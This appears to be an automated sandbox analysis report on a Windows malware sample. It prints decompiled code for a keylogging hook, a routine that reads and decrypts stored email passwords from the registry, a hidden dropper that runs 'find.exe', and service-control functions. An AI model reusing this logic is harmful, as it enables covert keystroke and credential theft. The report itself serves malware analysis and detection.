									_t50 = "~";
									_t55 = "`";
									goto L76;
								}
								if(__eflags == 0) {
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "<";
									_t55 = ",";
									goto L76;
								}
								__eflags = _t58 - 0xa3;
								if(_t58 > 0xa3) {
									__eflags = _t58 - 0xa5;
									if(__eflags <= 0) {
										L78:
										_t49 = L"[ALT]";
										goto L99;
									}
									__eflags = _t58 - 0xba;
									if(_t58 == 0xba) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ":";
										_t55 = ";";
										goto L76;
									}
									__eflags = _t58 - 0xbb;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "+";
									_t55 = "=";
									goto L76;
								}
								__eflags = _t58 - 0xa2;
								if(__eflags >= 0) {
									L71:
									_t49 = L"[CTRL]";
									goto L99;
								}
								__eflags = _t58 - 0x67;
								if(__eflags == 0) {
									_t49 = "7";
									goto L99;
								}
								__eflags = _t58 - 0x68;
								if(__eflags == 0) {
									_t49 = "8";
									goto L99;
								}
								__eflags = _t58 - 0x69;
								if(__eflags == 0) {
									_t49 = "9";
									goto L99;
								}
								__eflags = _t58 - 0xa0 - 1;
								if(__eflags > 0) {
									goto L94;
								}
								goto L100;
							}
							if(__eflags == 0) {
								_t49 = "6";
								goto L99;
							}
							__eflags = _t58 - 0x20;
							if(__eflags > 0) {
								__eflags = _t58 - 0x62;
								if(__eflags > 0) {
									_t66 = _t58 - 0x63;
									__eflags = _t66;
									if(__eflags == 0) {
										_t49 = "3";
										goto L99;
									}
									_t67 = _t66 - 1;
									__eflags = _t67;
									if(__eflags == 0) {
										_t49 = "4";
										goto L99;
									}
									__eflags = _t67 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t49 = "5";
									goto L99;
								}
								if(__eflags == 0) {
									_t49 = "2";
									goto L99;
								}
								_t69 = _t58 - 0x2d;
								__eflags = _t69;
								if(__eflags == 0) {
									_t49 = L"[INSERT]";
									goto L99;
								}
								_t70 = _t69 - 1;
								__eflags = _t70;
								if(__eflags == 0) {
									_t49 = L"[DEL]";
									goto L99;
								}
								_t71 = _t70 - 0x32;
								__eflags = _t71;
								if(__eflags == 0) {
									_t49 = "0";
									goto L99;
								}
								__eflags = _t71 - 1;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = "1";
								goto L99;
							}
							if(__eflags == 0) {
								_t49 = " ";
								goto L99;
							}
							__eflags = _t58 - 0x11;
							if(__eflags > 0) {
								_t73 = _t58 - 0x12;
								__eflags = _t73;
								if(__eflags == 0) {
									goto L78;
								}
								_t75 = _t73;
								__eflags = _t75;
								if(__eflags == 0) {
									_t49 = L"[CAPS]";
									goto L99;
								}
								__eflags = _t75 - 7;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = L"[ESC]";
								goto L99;
							}
							if(__eflags == 0) {
								goto L71;
							}
							_t77 = _t58 - 8;
							__eflags = _t77;
							if(__eflags == 0) {
								_t49 = L"[BKSP]";
								goto L99;
							}
							_t78 = _t77 - 1;
							__eflags = _t78;
							if(__eflags == 0) {
								_t49 = L"[TAB]";
								goto L99;
							}
							_t79 = _t78 - 4;
							__eflags = _t79;
							if(__eflags == 0) {
								_t49 = L"[ENTER]\r\n";
								goto L99;
							}
							__eflags = _t79 - 3;
							if(__eflags == 0) {
								goto L100;
							}
							goto L94;
						}
						L19:
						__eflags = _t58 - 0x5b;
						if(_t58 >= 0x5b) {
							goto L21;
						}
						_t36 = E00408E5B();
						__eflags = GetAsyncKeyState(0x10);
						__eflags = E00408E49(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
						_t53 =  !=  ? _t58 : _t58 + 0x20;
						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
						E00408E66( &_v24, _t36, __eflags);
						_t46 = _v8;
						goto L100;
					}
					if(_t58 > 0x40) {
						goto L19;
					}
					if(GetAsyncKeyState(0x10) == 0) {
						wsprintfW( &_v24, L"%c", _t58);
						_t49 =  &_v24;
						goto L99;
					}
					_t81 = _t58 + 0xffffffd0;
					_t90 = _t81 - 9;
					if(_t81 > 9) {
						goto L100;
					}
					switch( *((intOrPtr*)(_t81 * 4 +  &M00408E21))) {
						case 0:
							_t49 = ")";
							goto L99;
						case 1:
							__ecx = "!";
							goto L99;
						case 2:
							__ecx = "@";
							goto L99;
						case 3:
							__ecx = "#";
							goto L99;
						case 4:
							__ecx = "$";
							goto L99;
						case 5:
							__ecx = "%";
							goto L99;
						case 6:
							__ecx = "^";
							goto L99;
						case 7:
							__ecx = "&";
							goto L99;
						case 8:
							__ecx = "*";
							goto L99;
						case 9:
							__ecx = "(";
							goto L99;
					}
				} else {
					L100:
					return CallNextHookEx(0, _t46, _v12, _t57);
				}
			}

0x004089d5
0x004089d5
0x004089de
0x004089e1
0x004089e4
0x004089e8
0x004089eb
0x004089f0
0x004089fb
0x00408a00
0x00408aae
0x00408ab1
0x00408aff
0x00408aff
0x00408b02
0x00408c22
0x00408c24
0x00408cfb
0x00408cfd
0x00408d90
0x00408d90
0x00408d96
0x00408df1
0x00408df7
0x00408dfc
0x00408dff
0x00408e01
0x00408e01
0x00408e06
0x00408e06
0x00000000
0x00408e06
0x00408d98
0x00408d98
0x00408d9b
0x00408dda
0x00408de0
0x00408de5
0x00408cb9
0x00408cb9
0x00408cbc
0x00000000
0x00408cbc
0x00408d9d
0x00408da0
0x00408dc3
0x00408dc9
0x00408dce
0x00000000
0x00408dce
0x00408da2
0x00408db6
0x00408dbc
0x00000000
0x00408dbc
0x00408d03
0x00408d7b
0x00408d81
0x00408d86
0x00000000
0x00408d86
0x00408d05
0x00408d05
0x00408d0b
0x00408d64
0x00408d6a
0x00408d6f
0x00000000
0x00408d6f
0x00408d0d
0x00408d0d
0x00408d10
0x00408d4d
0x00408d53
0x00408d58
0x00000000
0x00408d58
0x00408d12
0x00408d12
0x00408d15
0x00408d36
0x00408d3c
0x00408d41
0x00000000
0x00408d41
0x00408d17
0x00408d1a
0x00000000
0x00000000
0x00408d22
0x00408d28
0x00408d2d
0x00000000
0x00408d2d
0x00408c2a
0x00408ce4
0x00408cea
0x00408cef
0x00000000
0x00408cef
0x00408c30
0x00408c36
0x00408c8b
0x00408c91
0x00408cd8
0x00408cd8
0x00000000
0x00408cd8
0x00408c93
0x00408c99
0x00408cc6
0x00408ccc
0x00408cd1
0x00000000
0x00408cd1
0x00408c9b
0x00408ca1
0x00000000
0x00000000
0x00408ca9
0x00408caf
0x00408cb4
0x00000000
0x00408cb4
0x00408c38
0x00408c3e
0x00408c81
0x00408c81
0x00000000
0x00408c81
0x00408c40
0x00408c43
0x00408c77
0x00000000
0x00408c77
0x00408c45
0x00408c48
0x00408c6d
0x00000000
0x00408c6d
0x00408c4a
0x00408c4d
0x00408c63
0x00000000
0x00408c63
0x00408c55
0x00408c58
0x00000000
0x00000000
0x00000000
0x00408c5e
0x00408b08
0x00408c13
0x00000000
0x00408c13
0x00408b0e
0x00408b11
0x00408b91
0x00408b94
0x00408be2
0x00408be2
0x00408be5
0x00408c09
0x00000000
0x00408c09
0x00408be7
0x00408be7
0x00408bea
0x00408bff
0x00000000
0x00408bff
0x00408bec
0x00408bef
0x00000000
0x00000000
0x00408bf5
0x00000000
0x00408bf5
0x00408b96
0x00408bd8
0x00000000
0x00408bd8
0x00408b98
0x00408b98
0x00408b9b
0x00408bce
0x00000000
0x00408bce
0x00408b9d
0x00408b9d
0x00408ba0
0x00408bc4
0x00000000
0x00408bc4
0x00408ba2
0x00408ba2
0x00408ba5
0x00408bba
0x00000000
0x00408bba
0x00408ba7
0x00408baa
0x00000000
0x00000000
0x00408bb0
0x00000000
0x00408bb0
0x00408b13
0x00408b87
0x00000000
0x00408b87
0x00408b15
0x00408b18
0x00408b5b
0x00408b5b
0x00408b5e
0x00000000
0x00000000
0x00408b65
0x00408b65
0x00408b68
0x00408b7d
0x00000000
0x00408b7d
0x00408b6a
0x00408b6d
0x00000000
0x00000000
0x00408b73
0x00000000
0x00408b73
0x00408b1a
0x00000000
0x00000000
0x00408b20
0x00408b20
0x00408b23
0x00408b51
0x00000000
0x00408b51
0x00408b25
0x00408b25
0x00408b28
0x00408b47
0x00000000
0x00408b47
0x00408b2a
0x00408b2a
0x00408b2d
0x00408b3d
0x00000000
0x00408b3d
0x00408b2f
0x00408b32
0x00000000
0x00000000
0x00000000
0x00408b38
0x00408ab3
0x00408ab3
0x00408ab6
0x00000000
0x00000000
0x00408ab8
0x00408ac7
0x00408ad4
0x00408adc
0x00408ae6
0x00408af2
0x00408af7
0x00000000
0x00408af7
0x00408a09
0x00000000
0x00000000
0x00408a1a
0x00408a9d
0x00408aa6
0x00000000
0x00408aa6
0x00408a1c
0x00408a1f
0x00408a22
0x00000000
0x00000000
0x00408a28
0x00000000
0x00408a2f
0x00000000
0x00000000
0x00408a39
0x00000000
0x00000000
0x00408a43
0x00000000
0x00000000
0x00408a4d
0x00000000
0x00000000
0x00408a57
0x00000000
0x00000000
0x00408a61
0x00000000
0x00000000
0x00408a6b
0x00000000
0x00000000
0x00408a75
0x00000000
0x00000000
0x00408a7f
0x00000000
0x00000000
0x00408a89
0x00000000
0x00000000
0x00408e0b
0x00408e0b
0x00408e1c
0x00408e1c

APIs

GetAsyncKeyState.USER32(00000010), ref: 00408A11
CallNextHookEx.USER32(00000000,?,?,?), ref: 00408E12

Part of subcall function 00408E66: GetForegroundWindow.USER32(?,?,?), ref: 00408E8F
Part of subcall function 00408E66: GetWindowTextW.USER32 ref: 00408EA2
Part of subcall function 00408E66: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408F0B
Part of subcall function 00408E66: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 00408F79
Part of subcall function 00408E66: lstrlenW.KERNEL32(00414AD0,00000008,00000000,?,?), ref: 00408FA2
Part of subcall function 00408E66: WriteFile.KERNEL32(?,00414AD0,00000000,?,?), ref: 00408FAE

Strings

[CTRL], xrefs: 00408C81
[ALT], xrefs: 00408CD8
[BKSP], xrefs: 00408B51
[INSERT], xrefs: 00408BCE
[ENTER], xrefs: 00408B3D
[ESC], xrefs: 00408B73
[TAB], xrefs: 00408B47
[DEL], xrefs: 00408BC4
[CAPS], xrefs: 00408B7D

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
API String ID: 2452648998-4143582258
Opcode ID: 20a26bd837e8a45a9da493f01822eff26ae27b03a4fc8edf5ebc4670da262466
Instruction ID: 05debb29b961db7218db3d5b35fbbb282043b3bd797af140fe8c149a1109971b
Opcode Fuzzy Hash: 20a26bd837e8a45a9da493f01822eff26ae27b03a4fc8edf5ebc4670da262466
Instruction Fuzzy Hash: 90919E32A09210C7D628125887587BA6521ABE1340F25853FEAC7B7BE0DF3C9DD256DF

Uniqueness

Uniqueness Score: -1.00%

Function 0040A29A, Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 296
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040A29A(void* __ecx, void* __edx, void* __eflags, void* _a4) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v292;
				char _v556;
				char _v820;
				char _v9012;
				char _v17204;
				long _t124;
				long _t130;
				long _t136;
				long _t142;
				void* _t180;
				void* _t181;
				void* _t199;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;

				_t199 = __edx;
				_t181 = __ecx;
				E00401190(0x4334, __ecx);
				_v8 = 0x1000;
				_v24 = 0;
				_v20 = 0;
				_t180 = _t181;
				_v16 = 0;
				E00401052( &_v292, 0, 0x104);
				E00401052( &_v556, 0, 0x104);
				E00401052( &_v820, 0, 0x104);
				E00401052( &_v9012, 0, _v8);
				_t207 = _a4;
				_t209 = _t208 + 0x30;
				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
					E004032FF( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t210 = _t209 + 0xc;
				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
					E004032FF( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t211 = _t210 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E004032FF( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t212 = _t211 + 0xc;
				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
					E004032FF( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t213 = _t212 + 0xc;
				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
					E004032FF( &_v24, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t214 = _t213 + 0xc;
				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
				_t225 = _t124;
				if(_t124 == 0) {
					E00401052( &_v17204, _t124, 0x1000);
					E0040A632( &_v9012,  &_v17204, _t225, _v8);
					_t214 = _t214 + 0x10;
					E004032FF( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t215 = _t214 + 0xc;
				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
				_t226 = _t130;
				if(_t130 == 0) {
					E00401052( &_v17204, _t130, 0x1000);
					E0040A632( &_v9012,  &_v17204, _t226, _v8);
					_t215 = _t215 + 0x10;
					E004032FF( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t216 = _t215 + 0xc;
				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
				_t227 = _t136;
				if(_t136 == 0) {
					E00401052( &_v17204, _t136, 0x1000);
					E0040A632( &_v9012,  &_v17204, _t227, _v8);
					_t216 = _t216 + 0x10;
					E004032FF( &_v16,  &_v17204,  &_v17204);
				}
				_v8 = 0x1000;
				E00401052( &_v9012, 0, 0x1000);
				_t217 = _t216 + 0xc;
				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
				_t228 = _t142;
				if(_t142 == 0) {
					E00401052( &_v17204, _t142, 0x1000);
					E0040A632( &_v9012,  &_v17204, _t228, _v8);
					_t217 = _t217 + 0x10;
					E004032FF( &_v16,  &_v17204,  &_v17204);
				}
				_v12 = 3;
				if(E00403261( &_v24) > 0) {
					L00401F95(_t217 - 0x10,  &_v24);
					L00401FCB(_t180);
				}
				E004013EF( &_v24);
				return 1;
			}

0x0040a29a
0x0040a29a
0x0040a2a2
0x0040a2ac
0x0040a2b8
0x0040a2c2
0x0040a2c7
0x0040a2c9
0x0040a2cc
0x0040a2da
0x0040a2e8
0x0040a2f8
0x0040a2fd
0x0040a303
0x0040a320
0x0040a32c
0x0040a32c
0x0040a33c
0x0040a346
0x0040a34b
0x0040a367
0x0040a373
0x0040a373
0x0040a37e
0x0040a38a
0x0040a38f
0x0040a3ab
0x0040a3b7
0x0040a3b7
0x0040a3c2
0x0040a3ce
0x0040a3d3
0x0040a3ef
0x0040a3fb
0x0040a3fb
0x0040a406
0x0040a412
0x0040a417
0x0040a433
0x0040a43f
0x0040a43f
0x0040a44a
0x0040a456
0x0040a45b
0x0040a473
0x0040a475
0x0040a477
0x0040a486
0x0040a49a
0x0040a49f
0x0040a4ac
0x0040a4ac
0x0040a4b7
0x0040a4c3
0x0040a4c8
0x0040a4e0
0x0040a4e2
0x0040a4e4
0x0040a4f3
0x0040a507
0x0040a50c
0x0040a519
0x0040a519
0x0040a524
0x0040a530
0x0040a535
0x0040a54d
0x0040a54f
0x0040a551
0x0040a560
0x0040a574
0x0040a579
0x0040a586
0x0040a586
0x0040a591
0x0040a59d
0x0040a5a2
0x0040a5ba
0x0040a5bc
0x0040a5be
0x0040a5cd
0x0040a5e1
0x0040a5e6
0x0040a5f3
0x0040a5f3
0x0040a5fb
0x0040a609
0x0040a614
0x0040a61b
0x0040a61b
0x0040a623
0x0040a62f

APIs

RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,74B5E710,74E48250,00000000,?,0040A25E), ref: 0040A31C
RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,74B5E710,74E48250), ref: 0040A363
RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 0040A3A7
RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 0040A3EB
RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 0040A42F
RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 0040A473
RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 0040A4E0
RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 0040A54D
RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 0040A5BA

Part of subcall function 0040A632: GlobalAlloc.KERNEL32(00000040,-00000001,74B5E730,?,?,?,0040A5E6,00001000,?,00000000,00001000), ref: 0040A650
Part of subcall function 0040A632: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040A5E6), ref: 0040A686
Part of subcall function 0040A632: lstrcpyW.KERNEL32 ref: 0040A6BD

Part of subcall function 00403261: lstrlenW.KERNEL32(74B60770,00403646,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,74B60770,00000000), ref: 00403268

Strings

POP3 Password, xrefs: 0040A46D
IMAP Password, xrefs: 0040A5B4
POP3 User, xrefs: 0040A3E5
Account Name, xrefs: 0040A316
Email, xrefs: 0040A35D
POP3 Server, xrefs: 0040A3A1
HTTP Password, xrefs: 0040A547
SMTP Server, xrefs: 0040A429
SMTP Password, xrefs: 0040A4DA

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
API String ID: 6593746-2537589853
Opcode ID: e2f79b5f2179572335bfc342311881575ea113eed7c6923cdc984f89a9bda2de
Instruction ID: 2b1db3b11cb7e59929a58ba4cea4362bf6e67b79cf15a766c9744ae1d48fa6e2
Opcode Fuzzy Hash: e2f79b5f2179572335bfc342311881575ea113eed7c6923cdc984f89a9bda2de
Instruction Fuzzy Hash: 8BA131B295025DBADB25EAA1CD46FDF737CAF14744F1001BAF605F21C0E678AB448B68

Uniqueness

Uniqueness Score: -1.00%

Function 004130B3, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 119
filestringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004130B3(void* __ecx, void* __eflags, long _a4) {
				intOrPtr* _v8;
				long _v12;
				struct _SHELLEXECUTEINFOA _v72;
				char _v1096;
				char _v2120;
				char _v3144;
				void* _t38;
				void* _t40;
				void* _t83;

				_t75 =  *_a4;
				_t68 = __ecx + 4;
				_v8 = __ecx + 4;
				E00403437(_t68, E00411DC0( *_a4 + 4,  *_t75));
				L00405EA5(_a4);
				_t38 = LoadResource(0, _a4);
				_a4 = SizeofResource(0, _a4);
				_t40 = LockResource(_t38);
				E00401052( &_v1096, 0, 0x400);
				E00401052( &_v2120, 0, 0x400);
				GetTempPathA(0x400,  &_v1096);
				lstrcatA( &_v1096, "find.exe");
				GetTempPathA(0x400,  &_v2120);
				lstrcatA( &_v2120, "find.db");
				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
				WriteFile(_t83, _t40, _a4,  &_v12, 0);
				CloseHandle(_t83);
				E00401052( &_v3144, 0, 0x400);
				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
				_v72.cbSize = 0x3c;
				_v72.lpFile =  &_v1096;
				_v72.fMask = 0x40;
				asm("xorps xmm0, xmm0");
				_v72.lpParameters =  &_v3144;
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movlpd [ebp-0x10], xmm0");
				_v72.hwnd = 0;
				_v72.lpVerb = 0;
				_v72.lpDirectory = 0;
				_v72.nShow = 0;
				_v72.hInstApp = 0;
				return ShellExecuteExA( &_v72);
			}

0x004130c2
0x004130c4
0x004130ca
0x004130db
0x004130e3
0x004130ee
0x00413101
0x00413104
0x0041311a
0x00413128
0x0041313e
0x00413152
0x00413160
0x0041316e
0x00413190
0x0041319b
0x004131a2
0x004131b5
0x004131d2
0x004131de
0x004131e5
0x004131f1
0x004131f8
0x004131fb
0x00413201
0x00413207
0x0041320c
0x00413211
0x00413214
0x00413217
0x0041321a
0x0041321d
0x0041322a

APIs

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

LoadResource.KERNEL32(00000000,?,00000000), ref: 004130EE
SizeofResource.KERNEL32(00000000,?), ref: 004130FA
LockResource.KERNEL32(00000000), ref: 00413104
GetTempPathA.KERNEL32(00000400,?), ref: 0041313E
lstrcatA.KERNEL32(?,find.exe), ref: 00413152
GetTempPathA.KERNEL32(00000400,?), ref: 00413160
lstrcatA.KERNEL32(?,find.db), ref: 0041316E
CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 00413189
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041319B
CloseHandle.KERNEL32(00000000), ref: 004131A2
wsprintfA.USER32 ref: 004131D2
ShellExecuteExA.SHELL32(0000003C), ref: 00413220

Strings

find.exe, xrefs: 0041314C
<, xrefs: 004131DE
@, xrefs: 004131F1
find.db, xrefs: 00413162
-w %ws -d C -f %s, xrefs: 004131CC

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
API String ID: 2504251837-265381321
Opcode ID: bccad047b4795f28292097b304ffd35b373fc86be8b8292526a0d2f8d1d4e484
Instruction ID: 327683ff76c92dcac9dc587a200830401a566031ee9550ea718045f46c5199e2
Opcode Fuzzy Hash: bccad047b4795f28292097b304ffd35b373fc86be8b8292526a0d2f8d1d4e484
Instruction Fuzzy Hash: 44410CB1900219ABDB10DFA5DD88FDEBBBCEF89304F1041A6F609A7150D7745A858FA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D508, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D508(short** _a4) {
				void* _t2;
				int _t8;
				void* _t13;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t17 = _t2;
				if(_t17 != 0) {
					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
					if(_t13 != 0) {
						if(StartServiceW(_t13, 0, 0) != 0) {
							L6:
							_t15 = 1;
							L7:
							CloseServiceHandle(_t17);
							CloseServiceHandle(_t13);
							_t8 = _t15;
							L8:
							return _t8;
						}
						if(GetLastError() != 0x420) {
							goto L7;
						}
						Sleep(0x7d0);
						if(StartServiceW(_t13, 0, 0) == 0) {
							goto L7;
						}
						goto L6;
					}
					CloseServiceHandle(_t17);
					_t8 = 0;
					goto L8;
				}
				return _t2;
			}

0x0040d514
0x0040d517
0x0040d51d
0x0040d521
0x0040d532
0x0040d536
0x0040d54e
0x0040d575
0x0040d577
0x0040d578
0x0040d57f
0x0040d582
0x0040d584
0x0040d586
0x00000000
0x0040d586
0x0040d55b
0x00000000
0x00000000
0x0040d562
0x0040d573
0x00000000
0x00000000
0x00000000
0x0040d573
0x0040d539
0x0040d53f
0x00000000
0x0040d53f
0x0040d58a

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D517
OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040D52C
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D539
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D546
GetLastError.KERNEL32 ref: 0040D550
Sleep.KERNEL32(000007D0), ref: 0040D562
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D56B
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D57F
CloseServiceHandle.ADVAPI32(00000000), ref: 0040D582

Strings

ServicesActive, xrefs: 0040D50F

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
String ID: ServicesActive
API String ID: 104619213-3071072050
Opcode ID: d05a9cbfe85e54a116a3953c8a6a91fbf817429a44bb3e29defd1f6c35a07c68
Instruction ID: 6ee4da6baa7cfdb34d525d31188451f87eeb6e2bc2d3ae9bbca9d79258fcd559
Opcode Fuzzy Hash: d05a9cbfe85e54a116a3953c8a6a91fbf817429a44bb3e29defd1f6c35a07c68
Instruction Fuzzy Hash: D3018FB1B402657BD3201BA3AC4CF9B3E6DDBDAB55B114036FB06F6190DA78890486BC

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA5B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167
servicestringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040DA5B(intOrPtr __ecx) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v20;
				short* _v24;
				signed int _v28;
				short** _v32;
				short* _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr* _t66;
				char* _t69;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr _t105;
				intOrPtr* _t112;
				intOrPtr _t113;
				char _t114;
				signed int _t115;
				signed int _t116;
				void* _t117;
				void* _t119;

				_t113 = __ecx;
				_v44 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v36 = 0;
				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
				if(_t90 == 0) {
					L9:
					_v40 = _v40 & 0x00000000;
					L10:
					L00405EA5(_v24);
					return _v40;
				}
				_v40 = 1;
				_v32 = _t113 + 0x28;
				while(1) {
					L2:
					_v16 = 0;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
					_t114 = _v20;
					_t66 = E00405EFF(_t114);
					_t112 = _t66;
					_t69 =  &_v20;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
					if(_t69 == 0 && GetLastError() != 0xea) {
						goto L9;
					}
					CloseServiceHandle(_t90);
					_t115 = 0;
					if(_v8 <= 0) {
						goto L9;
					}
					_t91 = _t112;
					while( *_t91 != 0) {
						E004035E5( &_v12,  *_t91);
						if(E00403248( &_v12, _v32) != 0) {
							_t116 = _t115 * 0x2c;
							E00403437( &_v24, E004035E5( &_v28,  *((intOrPtr*)(_t116 + _t112))));
							L00405EA5(_v28);
							_t92 = _v44;
							_v28 = _v28 & 0x00000000;
							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
							L00405EA5(_v12);
							_v12 = _v12 & 0x00000000;
							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
								_t105 = _v8;
								_t117 = 0;
								if(_t105 == 0) {
									goto L10;
								}
								while( *_t112 != 0) {
									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
										L21:
										_t117 = _t117 + 1;
										_t112 = _t112 + 0x2c;
										if(_t117 < _t105) {
											continue;
										}
										goto L10;
									}
									E004035E5( &_v12,  *_t112);
									if(lstrcmpW(_v12, _v24) != 0) {
										E004035E5(_t119,  *_t112);
										E004021BD(_t92 + 0x44,  &_v12);
									}
									L00405EA5(_v12);
									_v12 = _v12 & 0x00000000;
									_t105 = _v8;
									goto L21;
								}
								goto L10;
							}
							if(_v36 == 1) {
								goto L9;
							}
							E0040D49C(_v32, 2);
							E0040D508(_v32);
							_v36 = 1;
							E00401099(_t112);
							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
							if(_t90 != 0) {
								goto L2;
							}
							goto L9;
						}
						L00405EA5(_v12);
						_v12 = _v12 & 0x00000000;
						_t91 = _t91 + 0x2c;
						_t115 = _t115 + 1;
						if(_t115 < _v8) {
							continue;
						}
						goto L9;
					}
					goto L9;
				}
				goto L9;
			}

